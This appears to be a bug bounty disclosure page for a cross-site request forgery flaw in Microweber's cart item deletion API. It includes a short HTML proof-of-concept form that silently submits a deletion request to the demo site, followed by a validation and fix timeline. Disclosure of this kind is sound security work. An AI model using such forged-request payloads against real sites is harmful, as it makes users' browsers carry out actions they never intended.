Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Oct 26th 2021


Description

There is a CSRF on Delete Cart Item in users side.

I get this error "Item not removed from cart" message but the item already will be deleted.(message isn't correct and the delete action will be done)

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/remove_cart_item" method="POST">
      <input type="hidden" name="id" value="125" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

after that you click on submit button the item with 125 id will be deleted from the cart.

We have contacted a member of the microweber team and are waiting to hear back 7 months ago
Peter Ivanov validated this vulnerability 7 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 2fa9a6 3 months ago
Peter Ivanov has been awarded the fix bounty
api_callbacks.php#L126 has been validated
shop.js#L115-L133 has been validated
ShopManager.php#L101-L105 has been validated
shop.php#L104-L115 has been validated
to join this conversation